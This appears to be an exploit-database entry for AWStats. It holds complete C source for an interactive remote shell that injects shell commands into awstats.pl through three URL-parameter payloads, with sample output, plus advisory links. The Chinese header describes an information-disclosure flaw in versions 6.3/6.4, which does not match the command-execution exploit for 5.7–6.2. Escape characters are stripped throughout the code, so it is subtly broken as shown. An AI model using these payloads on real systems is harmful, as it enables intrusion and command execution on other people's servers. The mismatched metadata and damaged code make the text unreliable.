https://www.exploit-db.com/exploits/853
https://www.securityfocus.com/bid/90268
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-649

AWStats6.3和6.4中的awstats.pl使得远程攻击者可以通过设置调试参数来获取敏感信息。

/*
 * Awstats exploit "shell" 
 * code by omin0us
 * omin0us208 [at] gmail [dot] com
 * dtors security group
 * .:( http://dtors.ath.cx ):.
 *
 * Vulnerability reported by iDEFENSE
 * pluginmode bug has been found by GHC team.
 *
 * The awstats exploit that was discovered allows
 * a user to execute arbitrary commands on the 
 * remote server with the privileges of the httpd 
 *
 * This exploit combines all three methods of exploitation
 * and acts as a remote "shell", parsing all returned 
 * data to display command output and running in a loop
 * for continuous access.
 * 
 * bash-2.05b$ awstats_shell localhost                                     
 * Awstats 5.7 - 6.2 exploit Shell 0.1
 * code by omin0us
 * dtors security group
 * .: http://dtors.ath.cx :.
 * --------------------------------------
 * select exploit method:
 *        1. ?configdir=|cmd}
 *        2. ?update=1&logfile=|cmd|
 *        3. ?pluginmode=:system("cmd");
 *
 * method [1/2/3]? 1
 * starting shell...
 * (ctrl+c to exit)
 * sh3ll> id
 * uid=80(www) gid=80(www) groups=80(www)
 * DTORS_STOP
 * sh3ll> uname -a
 *
 * FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11 
 * 19:34:01 EDT 2004     omin0us@localhost:/usr/src/sys/compile/DTORS  i386
 * DTORS_STOP
 * sh3ll>
 *
 * this is licensed under the GPL
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP  "DTORS_STOP"

void usage(char *argv[]);

int main(int argc, char *argv[]){

	FILE *output;
	int sockfd;
	struct sockaddr_in addr;
	struct hostent *host;
	char *host_name=NULL, *awstats_dir=NULL;
	char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp, c, cli_opt;
	int i, j, flag, method, verbose=0;

	
	if(argc < 2){
		usage(argv);
	}
	
	printf("Awstats 5.7 - 6.2 exploit Shell 0.1n");	
	printf("code by omin0usn");
	printf("dtors security groupn");
	printf(".: http://dtors.ath.cx :.n");
    printf("--------------------------------------n");

	while(1){
		cli_opt = getopt(argc, argv, "h:d:v");

		if(cli_opt < 0)
			break;

		switch(cli_opt){
			case 'v':
				verbose = 1;
				break;
			case 'd':
				awstats_dir = optarg;
				break;
		}
	}

	if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
		printf("Please specify a Hostn");
		usage(argv);
	}

	if(!awstats_dir){
		awstats_dir = "/cgi-bin/awstats.pl";
	}
	
	printf("select exploit method:n"
	       "t1. ?configdir=|cmd}n"
	       "t2. ?update=1&logfile=|cmd|n"
	       "t3. ?pluginmode=:system("cmd");n");
	while(method != '1' && method != '2' && method != '3'){
		printf("nmethod [1/2/3]? ");
		method = getchar();
	}

	printf("starting shell...n(ctrl+c to exit)n");
		
	
while(1){
	i=0;
	j=0;
	memset(cmd, 0, CMD_BUFFER);
	memset(cmd_url, 0, CMD_BUFFER*3);
	memset(incoming, 0, IN_BUFFER);
	
	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
		printf("Error creating socketn");
		exit(1);
	}

	if((host = gethostbyname(argv[optind])) == NULL){
		printf("Could not resolv hostn");
		exit(1);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(PORT);
	addr.sin_addr = *((struct in_addr *)host->h_addr);

	printf("sh3ll> ");
	fgets(cmd, CMD_BUFFER-1, stdin);
	
	if(verbose)	
		printf("Connecting to %s (%s)...n", host->h_name, inet_ntoa(*((struct in_addr *)host->h_addr)));

	if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) != 0){
		printf("Count not connect to hostn");
		exit(1);
	}

	output = fdopen(sockfd, "a");
	setbuf(output, NULL);

	cmd[strlen(cmd)-1] = '';
	if(strlen(cmd) == 0){
		cmd[0]='i';
		cmd[1]='d';
		cmd[3]='';
	}

	for(i=0; i<strlen(cmd); i++){
		c = cmd[i];
		if(c == ' '){
			cmd_url[j++] = '%';
			cmd_url[j++] = '2';
			cmd_url[j++] = '0';
		}
		else{
			cmd_url[j++] = c;
		}
	}
	cmd_url[j] = '';

	if(method == '1'){
		if(verbose){
			printf("Sending Requestn");	
			printf("GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0nn", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
		}
	
		fprintf(output, "GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0nn", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
	}

	if(method == '2'){
		if(verbose){
			printf("Sending Requestn");
			printf("GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0nn", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
		}
		fprintf(output, "GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0nn", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
	}

	if(method == '3'){
		if(verbose){
			printf("Sending Requestn");
			printf("GET %s?pluginmode=:system("echo+%s;%s;echo+%s"); HTTP/1.0n"
"Connection: Keep-Aliven"
"Host: %snn", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
		}
		fprintf(output, "GET %s?pluginmode=:system("echo+%s;%s;echo+%s"); HTTP/1.0n"
"Connection: Keep-Aliven"
"Host: %snn", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
	}


	i=0;
	while(strstr(incoming, MAGIC_START) == NULL){
		flag = read(sockfd, &tmp, 1);
		incoming[i++] = tmp;

		if(i >= IN_BUFFER){
			printf("flag [-] incoming buffer fulln");
			exit(1);
		}
		if(flag==0){
			printf("exploitation of host failedn");
			exit(1);
		}
	}
	
	while(strstr(incoming, MAGIC_STOP) == NULL){
		read(sockfd,&tmp,1);
		incoming[i++] = tmp;
		putchar(tmp);
		if(i >= IN_BUFFER){
			printf("putchar [-] incoming buffer fulln");
			exit(1);
		}
	}
	printf("n");
	
	shutdown(sockfd, SHUT_WR);
	close(sockfd);
	fclose(output);
	}
	return(0);
}

void usage(char *argv[]){
        printf("Usage: %s [options] <host>n" , argv[0]);
        printf("Options:n");
        printf("    -d <awstats_dir>     directory of awstats scriptn");
        printf("                         '/cgi-bin/awstats.pl' is defaultn");
        printf("                         if no directory is specifiednn");
        printf("    -v                   verbose mode (optional)nn");
        printf("example: %s -d /stats/awstats.pl website.comnn", argv[0]);
        exit(1);
}	

// milw0rm.com [2005-03-02]

AWStats AWStats 6.4

AWStats AWStats 6.3

来源:SECUNIA
名称:14299
链接:http://secunia.com/advisories/14299
来源:XF
名称:awstats-information-disclosure(19477)
链接:http://xforce.iss.net/xforce/xfdb/19477
来源:BUGTRAQ
名称:20050214AWStats<=6.4Multiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/390368